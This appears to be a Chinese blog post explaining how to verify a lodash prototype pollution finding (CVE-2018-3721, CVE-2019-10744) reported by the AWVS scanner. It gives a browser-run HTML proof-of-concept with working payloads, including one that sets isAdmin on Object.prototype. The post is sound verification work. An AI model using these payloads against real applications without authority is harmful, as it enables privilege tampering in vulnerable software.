AWVS中lodash如何验证

作为一名漏扫攻城狮,时不时会在AWVS中看到lodash这个漏洞,但是我只管导出报告,该怎么验证呢?

验证POC

下面就是用于验证的POC,把这个html中的src进行修改为扫描的网站中的lodash.min.js然后浏览器打开

复制代码
<!DOCTYPE html>
<html>
<head>
  <title>Lodash 原型污染测试</title>
  <!-- 加载 Lodash -->
  <!-- 这里修改src中的链接 -->
  <script src="https://cdn.jsdelivr.net/npm/[email protected]/lodash.min.js"></script>
</head>
<body>
  <script>
    // 测试代码
    const payload = '{"constructor": {"prototype": {"lodash": true}}}';
    _.defaultsDeep({}, JSON.parse(payload));

    if ({}.lodash === true) {
      alert("⚠️ 漏洞存在!\n你的 Lodash 版本存在原型污染风险 (CVE-2018-3721, CVE-2019-10744)");
    } else {
      alert("✅ 安全!\n你的 Lodash 版本已修复注入漏洞");
    }
  </script>

  <script>
    // 测试代码
    const maliciousPayload = JSON.parse('{"__proto__": {"isAdmin": true}}');
    _.merge({}, maliciousPayload);

    // 检查是否污染成功
    if ({}.isAdmin === true) {
      alert("⚠️ 漏洞存在!\nObject.prototype 已被污染,isAdmin=true");
    } else {
      alert("✅ 安全!\n未检测到原型污染");
    }
  </script>
</body>
</html>

展示效果

相关推荐
Gobysec21 天前
Goby 漏洞安全通告| Apache Tomcat 远程命令执行(CVE-2025-24813)
tomcat·apache·poc·exp·漏洞扫描工具·漏洞验证·cve-2025-24813
白雾茫茫丶2 个月前
Next.js 实战 (八):使用 Lodash 打包构建产生的“坑”?
next.js·lodash
Gobysec4 个月前
Goby AI 2.0 自动化编写 EXP | Mitel MiCollab 企业协作平台 npm-pwg 任意文件读取漏洞(CVE-2024-41713)
poc·exp·漏洞扫描工具·漏洞验证·cve-2024-41713·mitel micollab
小浣熊喜欢揍臭臭5 个月前
Lodash的常用方法整理
javascript·lodash
wlym1236 个月前
lodash 和 lodash-es 的区别
javascript·es·lodash
Gobysec6 个月前
Goby 漏洞发布|CVE-2024-8353:WordPress GiveWP 插件 /admin-ajax.php 命令执行漏洞
wordpress·漏洞扫描工具·漏洞验证·cve-2024-8353
gobysec7 个月前
Goby 漏洞发布|(CVE-2024-45195)Apache OFBiz /viewdatafile 代码执行漏洞【已复现】
漏洞扫描·goby·漏洞验证
yangshuquan8 个月前
前端 JavaScript 的 _ 语法是个什么鬼?
前端·javascript·数组·lodash
小果子^_^9 个月前
前端安全——最新:lodash原型漏洞从发现到修复全过程
前端·安全·lodash